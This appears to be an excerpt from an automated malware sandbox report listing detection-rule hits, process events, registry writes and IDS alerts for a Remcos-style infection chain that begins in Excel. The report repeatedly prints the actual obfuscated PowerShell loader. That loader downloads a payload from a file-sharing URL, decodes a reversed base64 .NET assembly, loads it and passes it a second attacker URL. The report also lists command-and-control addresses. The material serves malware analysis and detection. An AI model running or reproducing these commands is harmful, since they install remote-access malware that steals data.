[System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = 
ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nE
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 
hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nE
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden 
-executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , ProcessId: 4084, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1h
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))", CommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3356, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3652, ProcessName: mshta.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE, ProcessId: 3892, ProcessName: powershell.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , ProcessId: 4084, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1h
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", ProcessId: 3992, ProcessName: csc.exe
                  Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 198.244.140.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3356, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3760, TargetFilename: C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs
                  Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3356, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , ProcessId: 4084, ProcessName: wscript.exe
                  Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3760, TargetFilename: C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3356, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))", CommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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
                  Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3760, TargetFilename: C:\Users\user\AppData\Local\Temp\ujcyfur4.fse.ps1

                  Data Obfuscation

                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", ProcessId: 3992, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  Source: Registry Key setAuthor: Joe Security: Data: Details: 8C 9E 01 F6 40 A6 1B 23 71 3A E3 43 96 02 9A 3D 12 55 5E 57 F8 34 20 57 E8 C9 4A 24 96 5B 1E 45 E9 C6 62 E9 B9 EC 58 FB 57 9D 14 15 0B 82 57 4B E1 27 38 DB 67 19 8B 55 10 D9 70 F5 74 E5 CE E8 3C F1 71 A5 45 90 C9 A7 E4 E8 81 A6 E6 98 A2 6C 74 65 CC 98 7D 19 5B DD 86 E5 22 6D 44 EC 05 C0 DB FC ED 17 FA 00 0F 61 A7 7E 59 2D 9E 5D BE AC A5 68 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 3984, TargetObject: HKEY_CURRENT_USER\Software\Rmc-H42H13\exepath
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-11-25T14:06:37.319565+0100 | 2024197 | 1 | A Network Trojan was detected | 172.234.205.135 | 80 | 192.168.2.22 | 49162 | TCP
                  2024-11-25T14:06:41.971767+0100 | 2024197 | 1 | A Network Trojan was detected | 172.234.205.135 | 80 | 192.168.2.22 | 49164 | TCP
                  2024-11-25T14:06:37.319515+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49162 | 172.234.205.135 | 80 | TCP
                  2024-11-25T14:06:41.846744+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49164 | 172.234.205.135 | 80 | TCP
                  2024-11-25T14:07:02.412468+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49171 | 172.234.205.135 | 80 | TCP
                  2024-11-25T14:07:21.342228+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 172.234.205.135 | 80 | 192.168.2.22 | 49173 | TCP
                  2024-11-25T14:07:35.806679+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 172.234.205.135 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-11-25T14:07:21.342228+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 172.234.205.135 | 80 | 192.168.2.22 | 49173 | TCP
                  2024-11-25T14:07:35.806679+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 172.234.205.135 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-11-25T14:07:24.964712+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 31.13.224.72 | 2412 | TCP
                  2024-11-25T14:07:27.766398+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49175 | 31.13.224.72 | 2412 | TCP
                  2024-11-25T14:06:33.524346+0100 | 2057635 | 1 | A Network Trojan was detected | 172.234.205.135 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-11-25T14:06:33.524346+0100 | 2057635 | 1 | A Network Trojan was detected | 172.234.205.135 | 80 | 192.168.2.22 | 49173 | TCP
